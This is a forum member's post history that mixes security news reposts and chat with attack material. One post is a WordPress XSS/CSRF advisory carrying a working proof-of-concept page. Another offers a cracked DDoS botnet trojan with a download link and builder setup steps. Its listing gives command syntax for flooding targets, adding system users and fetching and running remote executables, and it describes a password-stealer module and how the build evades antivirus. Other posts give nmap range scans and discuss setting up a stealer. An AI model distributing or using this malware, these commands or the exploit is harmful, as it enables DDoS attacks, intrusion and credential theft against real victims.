Everything posted by htmanpro

  1. Whoa, enough! He tried his luck too, what do you want now =))?
  2. Why the fuck are you censoring? On topic: Selling/trading/etc. anything that involves roots is not permitted.
  3. htmanpro

    14/88

    Relax, they can't stand you either :D! On topic: Welcome
  4. htmanpro

    Farewell RST

    Mistresses to support.... On topic: Man, I don't know you that well, but I've been visiting the forum for 1-2 years as a guest and I've seen that you're active and have useful posts; you're a core member around here. I hope maybe you'll come back someday.
  5. nmap -p 22 24.1.*.* -oN fisier.txt or alternatively nmap -p 22 24.5.0.1/16 -oS fisier.txt or nmap -p 22 24.1.0-255.1-254 -oN fisier.txt
  6. Document Title:
     ===============
     Wordpress 4.1 - XSS & CSRF Web Vulnerability

     Release Date:
     =============
     2014-12-30

     Product & Service Introduction:
     ===============================
     https://wordpress.org/

     Abstract Advisory Information:
     ==============================
     The Hackyard Security Group pentest team discovered a cross site request forgery issue and a cross site vulnerability in the Wordpress 4.1

     Vulnerability Disclosure Timeline:
     ==================================
     2014-12-27: Author Notification (0x0A)
     2014-12-30: Public Disclosure

     Discovery Status:
     =================
     Published

     Affected Product(s):
     ====================
     Product: Wordpress 4.1

     Exploitation Technique:
     =======================
     Remote

     Severity Level:
     ===============
     Medium

     Technical Details & Description:
     ================================
     A client-side cross site request forgery issue and a cross site scripting vulnerability has been discovered in the Wordpress version 4.1
     The client-side cross site request forgery vulnerability allows remote attackers to force client-side requests to execute application functions.
     The client-side cross site scripting vulnerability allows remote attackers to inject malicious script codes to compromise administrator session data.

     The XSS vulnerability is located in comment values of the wp-comments-post.php file POST method request. Remote attackers are able to inject malicious script codes to the client-side application request. The CSRF vulnerability is located in the same value request and allows to request the account session data. Both issues are only exploitable on the client-side of the application and the request method to inject is POST.

     The security risk of the client-side web vulnerability is estimated as medium with a CVSS (common vulnerability scoring system) count of 2.5. Exploitation of the client-side web vulnerability requires no privileged web-application user account and low or medium user interaction. Successful exploitation of the vulnerabilities result in non-persistent phishing mails, session hijacking, non-persistent external redirect to malicious sources and client-side manipulation of affected or connected module context.

     Request Method(s):
     [+] POST

     Vulnerable Module(s):
     [+] comment

     Vulnerable Parameter(s):
     [+] comment=

     Affected Module(s):
     [+] wp-comments-post.php

     Proof of Concept (PoC):
     =======================
     The client-side cross site request forgery issue and a cross site scripting vulnerability can be exploited by remote attackers with low or medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

     Manual steps to reproduce the vulnerabilities:
     You can use the following exploit code to verify the vulnerability. Save the code as .html. The malicious page needs to be surfed by a non expired administrator session to take over the user session data.

     PoC: wp-comments-post.php

     <html>
     <!-- CSRF PoC - generated by **0x0A** -->
     <body>
     <form action="http://127.0.0.1/wordpress/wp-comments-post.php" method="POST">
     <input type="hidden" name="author" value="Pentest" />
     <input type="hidden" name="email" value="pentest@hackyard.net" />
     <input type="hidden" name="url" value="https://hackyard.net" />
     <input type="alert" name="comment" value="<script>alert(document.cookie);</script>" />
     <input id="submit" class="submit" type="submit" value="Post Comment" name="submit">
     <input id="comment_post_ID" type="hidden" value="8" name="comment_post_ID">
     <input id="comment_parent" type="hidden" value="0" name="comment_parent">
     <input id="_wp_unfiltered_html_comment_disabled" type="hidden" value="d1a069167f" name="_wp_unfiltered_html_comment">
     </form>
     </body>
     </html>

     Reference(s): Video
     ======================
     LINK: https://www.youtube.com/watch?v=UD-iwqphWlk
     POC: https://www.youtube.com/watch?v=HL7ETe3A4Wg

     Solution - Fix & Patch:
     =======================
     2014-11-24: Filtering an html comments

     Security Risk:
     ==============
     The security risk of the cross site request forgery and cross site scripting vulnerability is estimated as medium. (CVSS 2.5)

     Credits & Authors:
     ==================
     Neo Hapsis aka 0x0A- Information Security Researcher [https://hackyard.net]

     Disclaimer & Information:
     =========================
     The information provided in this advisory is provided as it is without any warranty. Hackyard Security Group disclaims all warranties, either expressed or implied, including the warranties of merchant ability and capability for a particular purpose. Hackyard Security Group or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Hackyard Security Group or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

     Domains: https://hackyard.net
     Contact: admin@hackyard.net
     Facebook: facebook.com/Hackyard.net
     YouTube: youtube.com/user/HackyardSG

     Any modified copy or reproduction, including partially usages, of this file requires authorization from Hackyard Security Group. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Hackyard Security Group or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of Hackyard Security Group & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@hackyard.net) to get a permission.

     Source: hk
  7. Features
     - Written in C++, easily crypt is lightweight (compressed sample <15KB)
     - Full compatibility with all windows family (x86 and x64)
     - Bot has 7 types of attacks
     - Extremely stable system. Load on CPU and ram is very powerful.
     - does not attract attention to UAC Windows Firewall
     - can install port, referal and cookies individually for each attack
     - Supports up to 10 targets simultaneously
     - has a very low load on the cpu with the new, complex system parsing Teams (all analogs parsing passes within a function in multiple threads - it's extra work load on the processor. New bot enters all data in the array before the attack and come ready function parameters: address, port, referral, etc.)
     - has enormous power output of more than 1500 http (and more 30,000 udp) requests per minute due to direct interaction with network drivers, even on Windows Desktop! (Only when using winsock) is about 10 times more than some analogues and several more top (on this indicator) competitors.
     - in the control panel are: the number of requests per minute, right in the system, the version of the system.
     - Supports bypassing Cloudflare protection (!) and many other, more simple.
     - support and slow get slow post! mode
     - indicated in the packet header off the cache (cache-control: no-cache), which increases the load on the server.
     - Bot protection of panel.

     Modules:
     - PassGrabber (stealer): this module find and decrypt passwords. 26 software units supported (on October 2014). price $150 for base licence, $250 for lite licence, free for full.

     Detection:
     Validation build (without crypt and packing) only 3 AV’s of all triggered suspicion (avira, clamav, vba32). during local tests Kaspersky, Nod32, Drweb, Avast all missed file in 100% of cases.

     Attack modes and commands:
     As the system is a professional syntax with commands, this seems complicated, but only at first glance =)
     • dd1 basic operation by http protocol method get, using sockets. support *** cookies and $ $ $ ref and allows up to 10 targets simultaneously (separated by ";"). the fastest search volume attack. Example: DD1 = ?????? cookies *** $ $ $ referal; http://mail.ru cookies2 *** $ $ $ referal2
     • dd2 the same treatment as dd1, only the method of post. added optional parameter @ @ @ post_data. also supports up to 10 goals. Example: dd2 = ????? ?.?.?. - ??????? ??????? ??????, ???????????? ??????? PHP, MySQL ? Perl. ????????? ??????????? ??????? ?? ????????? ?????. ??????? ????? ?? *** cookies $ $ $ referal @ @ @ login = yyy & password = hhh, this team posted a username and password yyy hhh a script
     • dd3 attack http get method using the system library wininet.dll. good old attack used in many delphi bots. slow due to the limitations of desktop windows. not support the referral and cookies, supports up to 10 targets. Example: dd3 = http://host.com/script.php
     • dd4 attack http post method using the system library wininet. the same as dd3, only post. Example: DD4 = @ @ @ http://host.com/script.php @ @ @ = login & password = yyy hhh
     • dd5 icmp attack (pings). supports up to 10 targets. Example dd5 = 198.168.0.1; 199.0.0.1
     • dd6 udp attack. supports up to 10 targets. mandatory parameters: port and text. Example: dd6 = 192.168.0.2:27015 @ @ @ flud_text
     • dd7 attack http get method using the system library urmon.dll average speed attack, supports up to 10 targets and does not support cookies and referal
     • cfa command bypass the security cloudflare (!). used only during dd7. This is simple - the bot executes java script gets the desired cookie and cloudflare considers requests made dd7 authorized. Example: dd7 = ???? ???? ? ?????????, then (after fifteen minutes) cfa = ???? ???? ? ?????????
     • cmd command is executed on the command interpreter cmd.exe on the local machine. does not stop the execution of other commands. Example: cmd = net user goodwin / add
     • exe command to load and run the exe file. does not stop the execution of other commands. file will be saved under the same name, under which he was on the Internet. made three attempts to download a file. Example: exe = http://site.com/filename.exe

     Control Panel:
     We used a modified ~ 70% from another complex (purchased under agreements to resell and change), rewriting it almost completely, as it was found too many mistakes and did not like the code. Naturally everything was corrected and optimized - new pu you like it!

     Demonstration:
     how well the system is very powerful and to demonstrate the need 15-20 bots, which are always available - Sellers will try to demonstrate power.

     Prices:
     - Test License $0 (only for checking the forums and testers. updates not provided)
     - Lite Licence $300 (update/rebuild $100, upgrade to the new version $ 100)
     - Basic License $500 (Update / Rebuild $ 50 upgrade to the new version $ 100, the price of the modules will be installed later)
     - full license $950 (all updates Rebuild and modules are free)

     INSTRUCTIONS:
     1) Setup panel, read the howto included. (PS: Your MasterKey is: 0x2222)
     2) Open the builder (do not open "madnesscracked.exe")
     3) Write in URL in the builder, the url are usually http://yourdomain.com/index.php
     4) Click Update URL, should display a messagebox that the url has been changed.
     5) Your file is madnesscracked.exe (after you update url)

     Download: https://mega.co.nz/#!y85BkRzQ!b9mXFMehpzHGqxluTuMg_p8hh7oGAza9S1m8HxvPaqQ
     Source: trojanforge
  8. Hi, a friend (SmartFX) and I have started creating WordPress themes and themes for other platforms, HTML templates. We "managed" to modify a theme: the images + some scripts + CSS (we didn't create it from scratch because we don't know PHP). Demo Screenshot - The theme is free! - The PSDs (background/logo) are in the "images" folder! Download: Zippyshare.com - hitsmart-design.rar https://www.sendspace.com/file/8n5416 We look forward to your opinions and criticism!
  9. Well, you installed some add-on "infected" with that ad; try uninstalling all of them to see which one it comes from, and afterwards install what you need, don't install every crappy extension!
  10. htmanpro

    [XSS] ESET NOD32

    Congratulations, bro! Buy us each a beer out of the reward if anything comes of it :))
  11. You didn't put the stealer's password in the config as well!
  12. Astronaut Barry Wilmore asked for a ratcheting socket wrench Astronauts on the International Space Station have used their 3-D printer to make a wrench from instructions sent up in an email. It is the first time hardware has been "emailed" to space. Nasa was responding to a request by ISS commander Barry Wilmore for a ratcheting socket wrench. Previously, if astronauts requested a specific item they could have waited months for it to be flown up on one of the regular supply flights. Mike Chen, founder of Made In Space, the company behind the 3-D printer, said: "We had overheard ISS Commander Barry Wilmore (who goes by "Butch") mention over the radio that he needed one, so we designed one in CAD and sent it up to him faster than a rocket ever could have." Mr Wilmore installed the printer on the ISS on 17 November. On 25 November he used the machine to fabricate its first object, a replacement part for the printer. Nasa says the capability will help astronauts be more self-reliant on future long duration space missions. Mike Chen added: "The socket wrench we just manufactured is the first object we designed on the ground and sent digitally to space, on the fly. "It also marks the end of our first experiment—a sequence of 21 prints that together make up the first tools and objects ever manufactured off the surface of the Earth." The other 21 objects were designed before the 3D printer was shipped to the space station in September on a SpaceX Dragon supply flight. Analysis: David Shukman, BBC science editor If a 3D printer can churn out something as useful as a tool in space, what else is possible? Spare parts, components, even equipment, according to the company behind the printer, Made In Space. And that's just the start. As one might expect from an energetic Silicon Valley start-up, the vision is mind-boggling. Already it plans to send a larger 3D manufacturing machine into orbit next year. 
The ambition is for Nasa or other space agencies or companies to routinely send their printing orders up to the International Space Station and for a range of objects to be produced. This would open the way to create hardware not only for the ISS itself but also for equipment to be deployed beyond it, conceivably such as satellites. And, looking further ahead, the thinking becomes even more radical. Made In Space says it's been trying out possible raw materials for its printers including a substance similar to lunar soil. So in theory, a 3D printer despatched to the Moon might be able to dig into the lunar surface, scoop up what is called the regolith, and transform it into the elements needed for a moon base. That prospect is extremely distant, obviously. For the moment, the astronauts on board the ISS will be happy to know that if they need a new spanner, they can make one in under an hour. Source
  13. This is the first time automatic updates have been sent to Mac computers around the world Apple has sent out its first automatic security update for Mac computers as researchers warn about new bugs. Previously Apple has released security patches through its regular software update system which requires user approval. The latest bugs were so severe it felt it needed to get customers protected immediately, the firm said. "The update is seamless. It doesn't even require a restart," Apple spokesman Bill Evans told Reuters. The Mac bugs were mentioned in security bulletins issued last week by the Department of Homeland Security and the Carnegie Mellon University Software Engineering Institute. It identified dozens of technology companies, including Apple, whose products might be vulnerable. The vulnerability targets a component of its OS X operating system called the network time protocol (NTP) which is used for synchronising clocks on computer systems. The protocol is a global method of synchronising time over a network and has previously been exploited by hackers. Microsoft has been offering automatic updates for security flaws for some time. Apple developed technology for automatically pushing out security updates two years ago but has never previously used it. The firm said that it did not know of any cases where hackers had exploited the bug. Source
  14. Attackers can infect MacBook computers with highly persistent boot rootkits by connecting malicious devices to them over the Thunderbolt interface. The attack, dubbed Thunderstrike, installs malicious code in a MacBook's boot ROM (read-only memory), which is stored in a chip on the motherboard. It was devised by a security researcher named Trammell Hudson based on a two-year old vulnerability and will be demonstrated next week at the 31st Chaos Communication Congress in Hamburg. "It is possible to use a Thunderbolt Option ROM to circumvent the cryptographic signature checks in Apple's EFI firmware update routines," Hudson said in the description of his upcoming presentation. "This allows an attacker with physical access to the machine to write untrusted code to the SPI flash ROM on the motherboard and creates a new class of firmware bootkits for the MacBook systems." Malicious code installed in the MacBook boot ROM will be executed before the OS is loaded, meaning it can patch the OS kernel and have complete control over the system. It also means that reinstalling Mac OS X will not remove the bootkit and neither will replacing the hard disk drive, because the malicious code is not stored on it. The bootkit can even replace Apple's cryptographic key stored in the ROM with one generated by the attacker, preventing any future legitimate firmware updates from Apple, the researcher said in a blog post. Firmware updates are supposed to be signed, but the vulnerability exploited by this attack allows that mechanism to be bypassed. "Additionally, other Thunderbolt devices' Option ROMs are writable from code that runs during the early boot and the bootkit could write copies of itself to new Thunderbolt devices," the researcher said. "The devices remain functional, which would allow a stealthy bootkit to spread across air-gap security perimeters through shared Thunderbolt devices." 
This worm-like spreading capability is similar to that of BadUSB, a stealthy malware attack demonstrated earlier this year at the Black Hat security conference that can infect the firmware of USB devices and then use them to compromise other computers. Security researchers have also previously demonstrated methods to bypass Secure Boot, a security mechanism of the Unified Extensible Firmware Interface (UEFI) -- the BIOS replacement in modern computers -- in order to install bootkits. Source
  15. Sony has asked Twitter to suspend the account of a person who is alleged to have posted internal company documents and information released by hackers. Twitter has also been asked to destroy the "stolen" documents that are in its possession or control. A letter sent Monday by Sony Pictures Entertainment's attorney David Boies to Twitter General Counsel Vijaya Gadde, and obtained by some news services, claimed that someone using the Twitter handle @bikinirobotarmy is in possession of, and is using the account to publish "stolen documents and information" from the recent hack. Sony Pictures was hacked in late November and a variety of information, including corporate, employee data and unreleased movies were leaked. Some leaked emails of executives have proven to be particularly embarrassing for the company. The FBI has said North Korea was responsible for the hack, which came ahead of the release by Sony of a comedy movie about a plot to assassinate the country's leader Kim Jong Un. The Twitter account Sony wants suspended belongs to Val Broeksmit, who describes himself on his website as a person who "writes records, mixes and masters his own music." Broeksmit said on Monday that Twitter had forwarded to him the letter from Boies. The attorney had asked Twitter to hand over a copy of his letter to Broeksmit and ask him to cease publication of the information on Twitter. In a telephone interview, Broeksmit said he had tweeted the "silly, stupid stuff" that he thought was already in the public domain, and did not tweet any sensitive corporate information that could damage Sony. The musician had tweeted, for example, an email that suggested that Sony paid an actor to tweet about films. "It's absurd that Sony is going after me," he said. "They keep making mistakes." Broeksmit said he hadn't yet decided whether he would back down to Sony's demand or hire a lawyer. 
"SPE does not consent to Twitter's or any Twitter account holder's possession, review, copying, dissemination, publication, uploading, downloading, or making any use of the Stolen Information, and to request your cooperation in suspending the Account Holder's Twitter account and the account of any other user seeking to disseminate the Stolen Information via Twitter," Boies wrote in the letter. Twitter has previously suspended accounts of users publishing the confidential information, which was acknowledged by Boies in his letter. Citing Twitter's prohibition in its terms of service on the unauthorized publication of copyrighted material and other people's private and confidential information, or the use of Twitter for illegal purposes, Sony has threatened to hold Twitter responsible for damages or losses to Sony, if the account is not suspended and the information continues to be disseminated. "SPE will have no choice but to hold Twitter responsible for any damage or loss arising from such use or dissemination by Twitter, including any damages or loss to SPE or others, and including, but not limited to, any loss of value of intellectual property and trade secrets resulting from Twitter's actions," Boies wrote. Twitter spokesman Jim Prosser said the company had received the letter on Monday afternoon, but did not comment on the letter or indicate whether it planned to suspend the account. Boies had previously written to some news outlets to warn them that they weren't allowed to use stolen information, threatening them with possible responsibility for damages incurred by Sony in connection with the reports. John Ribeiro covers outsourcing and general technology breaking news from India for The IDG News Service. Follow John on Twitter at @johnribeiro. John's e-mail address is john_ribeiro@idg.com
  16. Thanks, I'll get started on them now!
  17. @SilenTx0 Can you recommend me a book, a site, something?
  18. It’s up to each of us to be proactive about security and privacy; it’s risky to trust a company to manage your privacy in a manner that benefits you the most and not them. If you could have a browser that offered security, privacy and speed for free, then why not try it? WhiteHat Security originally developed Aviator as the company’s in-house browser, but eventually released Aviator web browser in two flavors, OS X and Windows. It is billed as “the web’s most secure and private browser.” Users simply install the browser and it’s setup to maximize privacy and security safeguards by default. Unlike Chrome or Firefox, you don’t need to get add-ons or extensions to configure privacy and security. Those protections are built into Aviator, but since the browser uses open-source Chromium code, it does support “tens of thousands of extensions.” Unlike Google with Chrome, Microsoft with Internet Explorer and even Mozilla with Firefox, which profit from online advertising, WhiteHat has no advertising partners and does not sell your data. You are not a product being sold in exchange for free software. Aviator comes configured with the Disconnect extension, meaning bye-bye “privacy-destroying tracking.” Aviator’s search engine choices also come with Disconnect, meaning you are using a “privacy-enhanced default search engine.” It also comes with the User-Agent Switcher extension; websites identify browsers by user agents, but this extension allows you to appear as if you are browsing via Chrome, IE, iOS, Android, Windows Phone, Firefox, Opera or Safari. When you surf to a page that contains cookies, you will see cookies with a red X on it, which indicates “This page was prevented from setting cookies.” Plugin has a similar red X, blocked on the page by default, but you have options to always allow the plug-in, run plug-in this time, and manage plug-ins. The security and privacy benefits are why I like Aviator. 
The browser launches in “protected” (private) mode, protecting your privacy by default by not logging your history, cookies, or browser cache. Ads and other hidden online trackers are blocked; this also protects you from malvertising (malicious advertising). Third-party cookies are also not allowed and Aviator automatically cleans locally stored data when you exit the browser. In WhiteHat’s words, “There is no need to constantly make it your mission to keep from being invisibly tracked and spied on.” Why are Ghostery, Adblock Plus or Privacy Badger not also default extensions? Robert Hansen, aka @RSnake, Vice President of WhiteHat Security’s WhiteHat Labs was kind enough to answer my questions. Robert Hansen: Ghostery and Privacy Badger are mostly redundant, and Adblock Plus allows ads from companies like Google, which totally defeats the purpose of the software. But if you want a feature from one of those plugins or feel that Disconnect is missing something, yes, of course you can install any plugin you like. Are there any plans for Aviator to be offered as a mobile browser for iOS or Android? Robert Hansen: It's unlikely in the near term. Though, that is always an option. The major hurdle is actually the manufacturers who don't like mobile browsers. Might you offer a security/privacy-minded suggestion for a mobile browser? Robert Hansen: Disconnect offers similar functionality to their browser extension on mobile - that is probably the best option available, though not as feature rich from a privacy/security standpoint as Aviator is which combines their technology with a number of our own techniques. You can find more about Disconnect here; the free mobile app for iOS can be downloaded from iTunes and from Google Play for Android where it is lovely to see “Disconnect Search does not require any special permissions.” (There is also a Disconnect Secure Wireless app.) 
If you are curious how Aviator stacks up against other browsers in a simple HTML5 test, then Aviator scored 492 out of 555 points, compared to 475 using Firefox 34, 512 using Chrome 39, 376 using IE 11 and 429 using Safari 8. Source
  19. The simplest explanation for North Korea's suddenly dropping off the Internet was a distributed denial-of-service (DDoS) attack that overwhelmed the isolated nation's tenuous connection to the rest of the world, experts said Monday. North Korea's Internet connection went down around 11 a.m. ET Monday, and was restored about nine and a half hours later, at approximately 8:45 p.m. ET. But within hours, some sites checked by Computerworld, including North Korea's official news agency, were again offline. A DDoS attack could have been launched by a small group or even an individual, the researchers said. "If it turns out it was an attack, I'd be far more surprised if it was a government launching the attack than I would if it was a kid in a Guy Fawkes mask," said Matthew Prince, co-founder and CEO of security firm CloudFlare, in an email. Prince and others bet that a run-of-the-mill DDoS attack took down North Korea's Internet because the isolated country has a "pipe" to the Internet so narrow that a routine attack could easily flood its capacity and take it offline. Ofer Gayer, security researcher at Incapsula, estimated North Korea's total bandwidth at 2.5 Gbps, far under the capacity of many recent DDoS attacks, which typically are in the 10Gbps to 20Gbps range. "Even if North Korea had ten times their publicly reported bandwidth, bringing down their connection to the Internet would not be difficult from a resource or technical standpoint," Gayer said, also in an email. Almost all of North Korea's Internet traffic passes through a connection provided by China Unicom, the neighboring country's state-owned telecommunications company. North Korea has just a single block of IP (Internet protocol) addresses, or just 1,024 addresses, another vulnerability; in comparison, the U.S. boasts 1.6 billion IP addresses. 
"When organizations –- nation states or commercial entities -– rely on a single Internet service provider and a small range of IP addresses, they make themselves easy prey," Gayer said. "Attackers have a single target -– the one connection to the Internet backbone –- to flood with traffic." According to Prince of CloudFlare and Jim Cowie, chief scientist at Dyn Research, North Korea -- officially named the Democratic People's Republic of Korea (DPRK) -- went completely dark after a weekend of intermittent connectivity. For example, Computerworld was unable to reach the DPRK's Central News Agency, its official mouthpiece, much of Sunday, Dec. 21. The IDG News Service, which like Computerworld is owned and operated by IDG, reported Monday that North Korea had fallen off the Internet. North Korea's outage might have gone unreported but for the November hack of Sony Pictures; the release of gigabytes of the Hollywood studio's internal documents; Sony yanking The Interview, a comedy that portrayed the assassination of Kim Jung-un, the country's dictator, after hackers threatened American theaters; and the U.S. government's contention that North Korea was responsible. In comments last week, President Obama said, "We will respond proportionally [to North Korea], and we will respond in a place and time and manner we choose." But it's far more likely that North Korea's connection to the world was severed by hacktivists or cyber terrorists than by the U.S., or any other nation, the researchers said. Dan Holden, the director of Arbor Networks' security engineering and response team, said the attacks were relatively small in scale -- the weekend peak was just shy of 6 Gbps -- and among other targets, took aim at the primary and secondary DNS (domain name system) servers for most websites in North Korea. "It's not as if a super sophisticated attack is needed in order to cripple it," Holden said in a Monday blog. 
Holden also pointed out that a pair of hacktivist cyber-terrorist groups, Anonymous and Lizard Squad, had taken to Twitter to threaten to attack North Korea. Both groups have used DDoS attacks in the past to knock sites offline. Prince of CloudFlare posed other possibilities, ranging from North Korea purposefully cutting itself off from the Internet -- a move other authoritarian regimes have made, such as Syria -- to China Unicom breaking the connection. But Prince leaned toward the DDoS theory. "Given the largest DDoS attacks are an order of magnitude larger than [North Korea's capability], it is conceivable that an attack saturated the connection and knocked the site offline," Prince said. "It's worth remembering that just a few weeks ago a teenager in the U.K. pleaded guilty for single-handedly generating a 300Gbps attack against Spamhaus." Prince's reference was to the 17-year-old arrested this summer and charged with launching a massive DDoS attack in March 2013 against the anti-spam organization. Cowie of Dyn Research concurred with the other experts who pointed to the flimsiness of North Korea's Internet connection, although like Prince, he said there might have been causes other than a DDoS. "A long pattern of up-and-down connectivity, followed by a total outage, seems consistent with a fragile network under external attack," Cowie said in a Monday blog. "But it's also consistent with more common causes, such as power problems." North Korea did not mention the outage on its news website late Monday before it again went dark, but it did include a rambling 1,700-word missive from the National Defense Commission (NDC), the agency that controls the country's huge military forces. The NDC sharply threatened the U.S. with retaliation if a cyberattack was launched against the DPRK. "The army and people of the DPRK are fully ready to stand in confrontation with the U.S. 
in all war spaces including cyber warfare space to blow up those citadels," the NDC said in a bellicose statement. "Our toughest counteraction will be boldly taken against the White House, the Pentagon and the whole U.S. mainland, the cesspool of terrorism, by far surpassing the 'symmetric counteraction' declared by Obama." Source
  20. I tested it. With Steam I noticed something: it only grabs the username (from the application), but from the site it grabs the password too. You can take out the ETS from Yahoo because it's useless, since it's encrypted! On: I like it, very useful +1!
  21. Hackers who apparently attacked Sony's PlayStation Network (PSN) and Microsoft's Xbox Live on Christmas Day have taken aim at anonymous network Tor. Lizard Squad, which claimed responsibility for the outage, on Friday tweeted, "To clarify, we are no longer attacking PSN or Xbox. We are testing our new Tor 0day." While at least one site that maps the Tor network showed numerous routers with the name "LizardNSA," the extent of any attack was unclear. Tor directs user traffic through thousands of relays to ensure anonymity. In a Dec. 19 blog post, Tor managers warned of a possible attack, saying, "There may be an attempt to incapacitate our network in the next few days through the seizure of specialized servers in the network called directory authorities." Sony engineers, meanwhile, continued to struggle to get PSN back online Friday following the suspected denial-of-service (DDoS) attacks on Thursday. Sony's Twitter account for PSN asked frustrated gamers to be patient as staff worked to get the service back up and running, saying it did not know when PSN would be back online. "We are aware that some users are experiencing difficulty logging into the PSN," Sony said on its PlayStation support page, where the network was listed as offline. In a Twitter post showing a chat with the alleged hackers, MegaUpload founder Kim Dotcom suggested he had convinced Lizard Squad to stop the attacks in return for lifetime memberships on his file-transfer site Mega. Lizard Squad had taken credit for an apparent attack against PSN earlier this month, as well as an attack in August. The incident came at the same time that a U.S. flight carrying Sony Online Entertainment President John Smedley was diverted for security reasons. Xbox Live was back again Friday following disruptions, with core services up and running. "Yesterday, some users were unable to sign in to Xbox Live," a Microsoft spokesman said in a statement sent via email. 
"Our teams worked throughout the holiday to resolve the issue, and Xbox Live core services have now been restored." The company did not elaborate on the cause of the disruption. - Source
  22. Hi, I'm htmanpro. I do "nothing", I'm still learning... Well, I also do Photoshop from time to time because I'm passionate about photography, but even more about pentesting. What can I say about my knowledge? I'm a beginner in Linux and web app penetration testing. As for programming languages, I'm learning C++/C because a few people talked to me and told me it is very good for beginners; in parallel with C++/C I'm also learning about SQL, HTML and CSS, which are fairly easy in my opinion.. I came here to learn as much as I can about web security, but also to share my knowledge with those who need it!